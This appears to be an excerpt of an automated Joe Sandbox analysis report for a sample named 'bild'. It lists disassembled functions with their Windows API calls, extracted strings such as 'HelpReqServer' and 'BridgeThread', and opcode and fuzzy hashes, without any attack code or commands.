                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$FileModuleNameObjectSingleWait_memset
                                                                                      • String ID: /247$" /a$RunAnnot
                                                                                      • API String ID: 2581068044-4059077130
                                                                                      • Opcode ID: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
                                                                                      • Instruction ID: dc76f3c11fb5ad4c0452055a60ef983052eda761819ccc7684b04031b26646f7
                                                                                      • Opcode Fuzzy Hash: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
                                                                                      • Instruction Fuzzy Hash: 4541C030A04319AFEB11DFA4CC84FDDB7B9EB48704F1080A5E6589B284DB71E944CF90
                                                                                      Function 1112B270 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 78libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,?,?,?,?,1102E011,?,?,11194244,Trying to get mac addr for %u.%u.%u.%u,?,000000FF,?,?), ref: 1112B295
                                                                                      • GetProcAddress.KERNEL32(00000000,SendARP), ref: 1112B2AE
                                                                                      • wsprintfA.USER32 ref: 1112B2FB
                                                                                      • wsprintfA.USER32 ref: 1112B313
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,1102E011), ref: 1112B328
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Librarywsprintf$AddressFreeLoadProc
                                                                                      • String ID: %02x$IPHLPAPI.DLL$SendARP
                                                                                      • API String ID: 435568443-4085816232
                                                                                      • Opcode ID: 059c12f073bdf147a91715eca9bcb01dfedc32bce9f3742e1109da8ce792d870
                                                                                      • Instruction ID: 7d96227945af9bb0c0fa81f266df54215dce15e5fec16fb5673a6d202f8b9dc6
                                                                                      • Opcode Fuzzy Hash: 059c12f073bdf147a91715eca9bcb01dfedc32bce9f3742e1109da8ce792d870
                                                                                      • Instruction Fuzzy Hash: 87216D75E001299BCB14CFA6CD85AEEFBB8FF8D614F550118EC14A3300E635AE05CBA4
                                                                                      Function 11037230 Relevance: 13.6, APIs: 9, Instructions: 149COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 11037267
                                                                                        • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                        • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                      • _free.LIBCMT ref: 1103728F
                                                                                      • _strncpy.LIBCMT ref: 110372BB
                                                                                      • _strncpy.LIBCMT ref: 110372F8
                                                                                      • _malloc.LIBCMT ref: 11037332
                                                                                      • _strncpy.LIBCMT ref: 11037343
                                                                                      • _strncpy.LIBCMT ref: 11037383
                                                                                      • _malloc.LIBCMT ref: 110373B6
                                                                                      • _strncpy.LIBCMT ref: 110373CC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _strncpy$_free_malloc$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 1102513549-0
                                                                                      • Opcode ID: 49d6ee828f48e7441e9132c75d4151723e4ca8f50ebe71d103648970c0ae2386
                                                                                      • Instruction ID: 5b3f98012d02b14c7d353fffc6174d10c2b98c6782d71c8fdc241da8d4ec8af6
                                                                                      • Opcode Fuzzy Hash: 49d6ee828f48e7441e9132c75d4151723e4ca8f50ebe71d103648970c0ae2386
                                                                                      • Instruction Fuzzy Hash: 5A5152B5D04225AFDB20CF74CD84BCAFBECAF15348F004595998997240EBB5AA94CFE1
                                                                                      Function 1100D390 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,11195920), ref: 1100D3A4
                                                                                      • GetProcAddress.KERNEL32(00000000,11195910), ref: 1100D3B8
                                                                                      • GetProcAddress.KERNEL32(00000000,11195900), ref: 1100D3CD
                                                                                      • GetProcAddress.KERNEL32(00000000,111958F0), ref: 1100D3E1
                                                                                      • GetProcAddress.KERNEL32(00000000,111958E4), ref: 1100D3F5
                                                                                      • GetProcAddress.KERNEL32(00000000,111958C4), ref: 1100D40A
                                                                                      • GetProcAddress.KERNEL32(00000000,111958A4), ref: 1100D41E
                                                                                      • GetProcAddress.KERNEL32(00000000,11195894), ref: 1100D432
                                                                                      • GetProcAddress.KERNEL32(00000000,11195884), ref: 1100D447
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc
                                                                                      • String ID:
                                                                                      • API String ID: 190572456-0
                                                                                      • Opcode ID: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
                                                                                      • Instruction ID: 496fda0e4c6754f74ae7accc981fa1b683a1531f66a76574b420f2493807621a
                                                                                      • Opcode Fuzzy Hash: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
                                                                                      • Instruction Fuzzy Hash: BC318A719222349FE756CBE5CCD5B7AFFE9A748B19B00417AD42083248E7B46840CF90
                                                                                      Function 11113150 Relevance: 13.6, APIs: 9, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStockObject.GDI32(00000007), ref: 11113167
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 11113176
                                                                                      • SetBrushOrgEx.GDI32(?,00000000,00000000,00000000,?,11119DB4,?,00000001,00000001,00000000,1111E6D7,00000000,?,00000000), ref: 11113181
                                                                                      • GetStockObject.GDI32(00000000), ref: 11113189
                                                                                      • SelectObject.GDI32(?,00000000), ref: 11113192
                                                                                      • GetStockObject.GDI32(0000000D), ref: 11113196
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 1111319F
                                                                                      • SelectClipRgn.GDI32(00000000,00000000), ref: 111131B3
                                                                                      • SelectClipRgn.GDI32(?,?), ref: 111131D5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Object$Select$Stock$Clip$Brush
                                                                                      • String ID:
                                                                                      • API String ID: 2690518013-0
                                                                                      • Opcode ID: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
                                                                                      • Instruction ID: 6254f714a47a8412abfa64db40702d153c74c152478294c48941108971bda100
                                                                                      • Opcode Fuzzy Hash: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
                                                                                      • Instruction Fuzzy Hash: CC114C71604214AFE320EFA9CC88F56F7E8AF48714F114529E698DB294C774E840CF60
                                                                                      Function 110573B0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 188libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(111ED708,4012B9B4,1110EDDD,00000000,00000000,00000000,E8111B5E,111825D3,000000FF,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000), ref: 1107602E
                                                                                        • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(0000000C,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,4012B9B4,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 11076097
                                                                                        • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(00000024,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,4012B9B4,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 1107609D
                                                                                        • Part of subcall function 11075FE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,4012B9B4,00000000,00000001,00000000,00000000), ref: 110760A7
                                                                                        • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004D0,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,4012B9B4,00000000,00000001,00000000,00000000), ref: 110760FC
                                                                                        • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004F8,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,4012B9B4,00000000,00000001,00000000,00000000), ref: 11076105
                                                                                      • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1105759C
                                                                                      • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 110575E1
                                                                                      • SetLastError.KERNEL32(00000078), ref: 110575F4
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 110575FF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalInitializeSection$Library$AddressCreateErrorEventFreeLastLoadProc
                                                                                      • String ID: Kernel32.dll$WTSGetActiveConsoleSessionId$
                                                                                      • API String ID: 3780373956-2395619914
                                                                                      • Opcode ID: ccdea510e774544ecb2f96d5e0f14d7635a3fa6427d5c0afb47a3670e03c907f
                                                                                      • Instruction ID: 5b2845002196474fabc536bb645ff26533f5159a1a467828fb1dae30e08bae14
                                                                                      • Opcode Fuzzy Hash: ccdea510e774544ecb2f96d5e0f14d7635a3fa6427d5c0afb47a3670e03c907f
                                                                                      • Instruction Fuzzy Hash: C47149B4A01215AFDB10CFAAC8C0E9AFBF9FF88314F24819AE91597314D771A941CF64
                                                                                      Function 110B73D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 141synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • Part of subcall function 110B0260: _memset.LIBCMT ref: 110B026C
                                                                                        • Part of subcall function 110B0260: _memset.LIBCMT ref: 110B029D
                                                                                        • Part of subcall function 110B0AD0: timeGetTime.WINMM(_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B0AD6
                                                                                        • Part of subcall function 110B0AD0: timeGetTime.WINMM(111F00F8,111E5C98,?), ref: 110B0BA5
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FA,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B743D
                                                                                      • GetDC.USER32(00000000), ref: 110B7481
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000E), ref: 110B748C
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 110B7497
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 110B74A3
                                                                                        • Part of subcall function 110B3090: SetEvent.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30A8
                                                                                        • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B30B5
                                                                                        • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30C8
                                                                                        • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30D5
                                                                                        • Part of subcall function 110B3090: WaitForSingleObject.KERNEL32(?,000003E8,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30F3
                                                                                        • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B3100
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$CapsDeviceObjectSingleTimeWait_memsettime$EventRelease__wcstoi64
                                                                                      • String ID: TraceScrape$_debug
                                                                                      • API String ID: 2936113293-4091781993
                                                                                      • Opcode ID: 9cdd8e8a5d521a6398e64c309cb34abd0cea1cc8d3252b81e48429c5feacb1e5
                                                                                      • Instruction ID: 6857b597a808110f0f281143ea82df92f461d6df4c4e0b5b1330fe4484300919
                                                                                      • Opcode Fuzzy Hash: 9cdd8e8a5d521a6398e64c309cb34abd0cea1cc8d3252b81e48429c5feacb1e5
                                                                                      • Instruction Fuzzy Hash: E941A679E042469BDB05CFB4C8D4FAFBBB5EB84704F1941ADE905AB285DA70EC04C7A4
                                                                                      Function 11027030 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122windowsleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11027053
                                                                                      • TranslateMessage.USER32(?), ref: 11027081
                                                                                      • DispatchMessageA.USER32(?), ref: 1102708B
                                                                                      • Sleep.KERNEL32(000003E8), ref: 11027114
                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102717A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$DispatchSleepTranslate
                                                                                      • String ID: Bridge$BridgeThread::Attempting to open bridge...
                                                                                      • API String ID: 3237117195-3850961587
                                                                                      • Opcode ID: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
                                                                                      • Instruction ID: 926780c6f4d8c8949c1ee256bdfa0d08ed5449f0693c43c0c5ab50156846c558
                                                                                      • Opcode Fuzzy Hash: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
                                                                                      • Instruction Fuzzy Hash: AB41B475D01626DBEB15CBEDCC84EBEBBB9AB54708F900169E92593244E735E500CBA0
                                                                                      Function 11137070 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 111370A6
                                                                                      • _free.LIBCMT ref: 111370DD
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • _free.LIBCMT ref: 1113716D
                                                                                        • Part of subcall function 1110F270: InterlockedDecrement.KERNEL32(?), ref: 1110F278
                                                                                      • _free.LIBCMT ref: 1113713E
                                                                                        • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                        • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free$DecrementErrorFreeHeapInterlockedLast__wcstoi64_malloc
                                                                                      • String ID: *HelpReqServer$Client$
                                                                                      • API String ID: 1390041139-761420396
                                                                                      • Opcode ID: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
                                                                                      • Instruction ID: 8e3468a70864abf3cc9909560d123acfb2a7f2167445c6f0ed38d11247114e31
                                                                                      • Opcode Fuzzy Hash: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
                                                                                      • Instruction Fuzzy Hash: 6B313877B001156BDB00DE58DC81BAEF3A9EF88325F154169ED04AB380D675F904C7D5
